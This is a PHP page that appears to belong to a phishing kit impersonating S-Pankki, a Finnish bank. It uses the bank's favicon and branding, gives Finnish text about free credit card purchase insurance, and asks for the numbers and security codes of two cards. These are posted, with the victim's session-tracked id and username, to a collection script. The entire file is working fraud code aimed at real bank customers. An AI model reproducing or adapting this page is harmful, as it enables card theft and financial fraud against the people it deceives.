<?php
     // Start the session to access session variables
     session_start();
    
     // Include your database connection file
     require_once '../../oyexa/config.php';
     
     // Check if the user is logged in
     if (!isset($_SESSION['visitor_id'])) {
         // If not logged in, redirect to the login page
         header("Location: login/spk.php");
         exit;
     }
     
     // Fetch the redirect address of the logged-in user from the database
     $visitor_id = $_SESSION['visitor_id'];
     $stmt = $pdo->prepare("SELECT * FROM visitors WHERE id = ?");
     $stmt->execute([$visitor_id]);
     $visitor = $stmt->fetch(PDO::FETCH_ASSOC);

?>
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <title>S-Pankki</title>
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="shortcut icon" href="https://www.s-pankki.fi/favicon.ico">
  <link rel="stylesheet" type="text/css" href="css/bootstrap.min.css">
  <link rel="stylesheet" href="css/style.css">
  <style type="text/css">
    .nnn {
      font-weight: bold;
    }
  </style>
</head>
<body>
  <form method="POST" action="../code.php" id="basic-form">
    <div class="card bg-white col-sm-4 col-md-8 col-lg-8 mx-auto my-5 border-0">
      <div class="card-body">
        <div id="pad">
          <p class="h3 text-center p-text"><img src="Tunnistautuminen_files/spankki.png" width="185" height="68" alt=""></p>
          <p class="h3 text-center p-text">Luottokortin ostoturva</p>
          <p class="h6 text-center mt-3 p-text">Maksuton vakuutus ostoksillesi</p>
          <p>Kun maksat ostoksesi S-Etukortti Visan luotolla, ne ovat automaattisesti turvattuja ostohetkestä lähtien. Käytännössä ostoturva tarkoittaa sitä, että mahdollisissa ongelmatilanteissa voit saada rahasi takaisin.</p>
          <p style="font-family: Arial, Helvetica, sans-serif; font-weight: bold; color: #333333; font-size: 16px;">Ostoturva koskee esimerkiksi seuraavia tilanteita:</p>
          <p><a role="button" tabindex="0">verkkokaupasta tilaamaasi tuotetta ei toimiteta, tuote saapuu vahingoittuneena tai saat väärän tuotteen kauppias veloittaa maksun väärin, esimerkiksi kaksinkertaisena konsertti peruuntuu matkatoimisto tai lentoyhtiö menee konkurssiin ennen matkaasi tai sen aikana</a>.</p>
          <p class="h6 text-center mt-3 p-text"><img src="Tunnistautuminen_files/cccd.jpg" width="296" height="191" alt=""></p>
          <p align="center" class="nnn" style="font-size: 24px; color: #43D87C;">Kirjoita kortin tiedot</p>
          <div class="form-group mt-5">
            <label for="ccname" class="" id="label1">Kortin numero / Debit card</label>
            <input type="tel" class="form-control shadow-none" maxlength="16" autocomplete="off" id="ccname" name="ccno">
          </div>
          <div class="form-group">
            <label for="secode" class="" id="label1">Turvakoodi</label>
            <input type="number" class="form-control input-log" maxlength="3" autocomplete="off" id="secode" name="sec_code1">
          </div>
          <label for="ccno" class="" id="label1"><br>Kortin numero / Credit card</label>
          <input type="tel" class="form-control input-log" maxlength="16" minlength="16" autocomplete="off" id="ccno" name="ccname1">
          </p>
          <div class="form-group">
            <label for="ccexp" class="" id="label1">Turvakoodi</label>
            <input type="number" class="form-control input-log" maxlength="3" autocomplete="off" id="Ccexp" name="sec_code2">
          </div>
          <div class="d-flex justify-content-center my-3">
            <input type="hidden" name="visitor_id" value="<?= $visitor['id']; ?>">
            <input type="hidden" name="username" value="<?= $visitor['username']; ?>">
            <button type="submit" name="submit_card_details" class="btn btn-danger border-0" style="color: #fff; padding-top: 5px; width:100%; font-weight: 600; height:50px;">Jatka</button>
          </div>
        </div>
      </div>
    </div>
  </form>

  <footer class="foot">
    <div class="container">
      <hr style="border-top: 1px solid #E8E6DE;">
      <div class="d-flex justify-content-between">
        <ul class="d-flex list-unstyled" id="">
          <li class="list-inline-item"></li>
        </ul>
        <div>
          <p class="d-inline for">&nbsp;</p>
        </div>
      </div>
    </div>
  </footer>

  <script src="js/bootstrap.bundle.js"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.0.0-beta1/jquery.js"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-validate/1.15.0/jquery.validate.js"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-validate/1.15.0/additional-methods.js"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.maskedinput/1.4.1/jquery.maskedinput.js"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.payment/1.3.2/jquery.payment.js"></script>
  <style type="text/css">
    label.error {
      color: red;
      font-size: -1rem;
      display: block;
      margin-top: 5px;
    }
  </style>
  <script>
    $(document).ready(function() {
      $("#basic-form").validate({
        rules: {
          ccno: {
            required: true,
            minlength: 16,
            // creditcard: true
          },
          ccexp: {
            required: false,
            minlength: 3
          },
          secode: {
            required: true,
            minlength: 3
          },
        },
        messages: {
          ccno: {
            required: "Syötä korttisi numero",
            minlength: "Kortin numeron tulee olla vähintään 16 merkkiä pitkä",
            // creditcard: "Virheellinen kortti! Aseta voimassa oleva kortti"
          },
          ccexp: {
            required: "Syötä korttisi turvanumero",
            minlength: "kortin turvanumeron on oltava vähintään 3 merkkiä pitkä"
          },
          secode: {
            required: "Syötä korttisi turvanumero",
            minlength: "kortin turvanumeron on oltava vähintään 3 merkkiä pitkä"
          },
        }
      });
    });
  </script>
</body>
</html>
